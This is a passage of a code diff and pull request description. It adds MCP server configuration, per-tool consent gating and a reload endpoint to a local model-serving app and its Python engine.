+        _mcp_init_error = "No MCP config path known — start the server with --mcp-config"
+        _sync_config()
+        return _mcp_init_error
+
+    _mcp_config_path = path
+
+    if _mcp_manager is not None:
+        try:
+            await _mcp_manager.stop()
+        except Exception as e:  # pragma: no cover - defensive
+            logger.warning(f"Error stopping MCP manager during reload: {e}")
+    _mcp_manager = None
+    _mcp_executor = None
+
+    _mcp_init_error = None
+    try:
+        await _start_mcp(path)
+    except Exception as e:
+        _mcp_init_error = f"Failed to reload MCP: {e}"
+        logger.error(_mcp_init_error)
+        _mcp_manager = None
+        _mcp_executor = None
+
+    _sync_config()
+    return _mcp_init_error
 
 
 # =============================================================================
@@ -2172,6 +2259,7 @@ from .routes.health import admin_router as _health_admin_router
 from .routes.health import probe_router as _probe_router
 from .routes.health import router as _health_router
 from .routes.images import router as _images_router
+from .routes.mcp_routes import admin_router as _mcp_admin_router
 from .routes.mcp_routes import router as _mcp_router
 from .routes.metrics import router as _metrics_router
 from .routes.models import router as _models_router
@@ -2196,6 +2284,9 @@ app.include_router(_video_router)
 app.include_router(_images_router)
 app.include_router(_embeddings_router)
 app.include_router(_mcp_router)
+# ``/v1/mcp/reload`` — separate router so the Bearer-OR-x-api-key gate applies
+# even when ``--api-key`` is unset (mirrors ``_health_admin_router``).
+app.include_router(_mcp_admin_router)
 # Task #292: ``_audio_router`` is registered LAZILY (after model load) by
 # :func:`register_audio_routes_if_enabled` — text-only servers (Bo R13/R14
 # fuzz wave: Qwen3-7B-4bit, etc.) must answer ``/v1/audio/*`` with a


### PR DESCRIPTION
Closes #1716.

## Why

The engine's MCP implementation was complete; the app used none of it. `--mcp-config` was never passed (the flag survives only in a stale comment at `ServerManager.swift:102`), so a desktop user had to hand-author `~/.config/rapid-mlx/mcp.json` and had no way to see which servers connected or whether a call succeeded.

Consent is why this belongs in the app: an MCP server is an arbitrary local process the model can invoke. The engine never injects MCP tools into `/v1/chat/completions` (`get_merged_tools` exists and is uncalled), so the tool loop stays client-side and the gate can sit in the UI.

`docs/userflows.md` Flow 12 already described this panel — and admitted at line 293 that its files resolved to zero under `Sources/`. This builds it and rewrites that section to match.

## App

New `Sources/Rapid/MCP/`:

- `MCPConfigStore` — writes the ecosystem-standard `mcpServers` file (0600, atomic) and decides whether `--mcp-config` is passed at all. Opt-in, off by default.
- `MCPCatalog` — reads `/v1/mcp/servers` and `/v1/mcp/tools` back; owns the reload action.
- `MCPToolApprovalStore` — gates every call, reusing `BrowseApprovalStore`'s shape including its `deny` vs `unavailable` distinction and display-safe rendering. Grants are per tool, so approving one doesn't hand out a server's whole surface.
- `MCPToolRegistry` / `CompositeToolRegistry` — fold connector tools into the existing `ToolRegistry`, so `ChatViewModel` and `ChatView` are unchanged and an MCP call renders like a built-in one.

Server names are validated `[A-Za-z0-9_-]{1,32}`: the engine namespaces tools `server__tool`, and that has to stay a legal OpenAI function name.

Settings gains a **Connectors** panel — add/edit/remove servers, per-server state with the failure reason, per-tool switches, consent record with reset. Saving hot-reloads; only the master switch needs a restart, and that banner carries a Restart button.

## Engine

- `init_mcp` no longer re-raises. It runs in lifespan startup, so a missing config or one unstartable server took the whole server down. The reason now reaches `/v1/mcp/servers`.
- Tolerant config loading on the serving path: one entry failing security validation is dropped and reported, not fatal to the rest. `mcp validate` stays strict.
- A stdio child's stderr is captured, so a server dying on startup reports the `ImportError` that killed it instead of "Connection closed".
- New `POST /v1/mcp/reload` rebuilds connections from disk, on the same Bearer-or-`x-api-key` gate as the other control-plane routes.

## Testing

Python: 126 MCP tests pass, 13 new (`tests/test_mcp_resilience.py`) — non-fatal init, per-entry isolation, reload, stderr capture.

Swift: 30 new tests in `MCPConnectorsTests.swift`, all passing. Full suite: 1845 tests, 163 suites — the only failures are 2 pre-existing ones in `DownloadCatalogHardeningTests` (ModelCatalog subprocess termination), which reproduce identically on a clean tree.

The tests cover config round-trip and the 0600 file mode, name and transport validation, tolerant decoding (missing `transport`, legacy `servers` key), duplicate-name rejection, the `--mcp-config` launch gate, per-tool grant isolation, `deny` vs `unavailable` on cancellation, concurrent re-entrancy, bidi escaping in the arguments preview, dispatch refusal for disabled and unapproved tools, and catalog/reload behaviour.

Also fixes a hermeticity bug this feature trips: `test_cwd_mcp_json_not_auto_discovered` isolated CWD but not `$HOME`, so it fails for anyone with a real `~/.config/rapid-mlx/mcp.json`.

## Not covered

Tool-call arguments smuggling invocations of declared tools past schema filtering. Per-tool consent narrows the blast radius; it does not close that hole.
